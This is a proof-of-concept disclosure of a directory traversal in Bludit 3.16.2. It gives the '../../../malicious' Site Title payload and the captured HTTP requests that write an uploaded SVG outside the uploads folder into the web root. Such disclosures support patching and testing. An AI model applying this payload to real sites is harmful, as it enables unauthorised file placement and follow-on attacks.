# Exploit Title: Directory Traversal "Site Title" - bluditv3.16.2 # Date: 07/2025 # Exploit Author: Andrey Stoykov # Version: 3.16.2 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Directory Traversal "Site Title" #1: Steps to Reproduce: 1. Login with admin account and "General" > "General" 2. Set the "Site Title" to the following payload "../../../malicious" 3. Next click on "Logo" and the upload the SVG file // HTTP POST Request POST /bludit/admin/settings HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 1208 Origin: http://192.168.58.133 Sec-GPC: 1 Connection: keep-alive Referer: http://192.168.58.133/bludit/admin/settings Cookie: BLUDIT-KEY=re283ptc2s1pd9emfuqhiulto2 Upgrade-Insecure-Requests: 1 Priority: u=0, i [...]title=htdocs/bludit/bl-content/uploads/../../../malicious[...] // HTTP Response HTTP/1.1 301 Moved Permanently Date: Sat, 28 Jun 2025 21:27:33 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 [...] // HTTP POST Request Uploading SVG File POST /bludit/admin/ajax/logo-upload HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 [...] ------geckoformboundaryb7a89b3d43771e77a278c9384a361332 Content-Disposition: form-data; name="tokenCSRF" 59fc6f48ad5d60b39699491cada2390e1b42531b ------geckoformboundaryb7a89b3d43771e77a278c9384a361332 Content-Disposition: form-data; name="inputFile"; filename="evilsvgfile-xss-bypass.svg" Content-Type: image/svg+xml ------geckoformboundaryb7a89b3d43771e77a278c9384a361332-- // HTTP Response HTTP/1.1 200 OK Date: Sat, 28 Jun 2025 21:28:21 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 [...] {"status":0,"message":"Image uploaded.","filename":"..\/..\/..\/malicious.svg","absoluteURL":"http:\/\/ 192.168.58.133 \/bludit\/bl-content\/uploads\/..\/..\/..\/malicious.svg","absolutePath":"\/opt\/lampp\/htdocs\/bludit\/bl-content\/uploads\/..\/..\/..\/malicious.svg"} root@debian:/opt/lampp/htdocs# ls -lah total 16K drwxrwxrwx 3 root root 4.0K Jun 28 17:28 . drwxr-xr-x 31 root root 4.0K Jun 3 16:26 .. drwxrwxrwx 7 debian debian 4.0K Aug 25 2024 bludit -rw-r--r-- 1 daemon daemon 283 Jun 28 17:28 malicious.svg // HTTP GET Request Accessing the SVG File GET /malicious.svg?time=0.3289154512636364 HTTP/1.1 Host: 192.168.58.133 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 [...] // HTTP Response HTTP/1.1 200 OK Date: Sat, 28 Jun 2025 21:28:21 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 Last-Modified: Sat, 28 Jun 2025 21:28:21 GMT ETag: W/"11b-638a8794da6e3" Accept-Ranges: bytes Content-Length: 283 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: image/svg+xml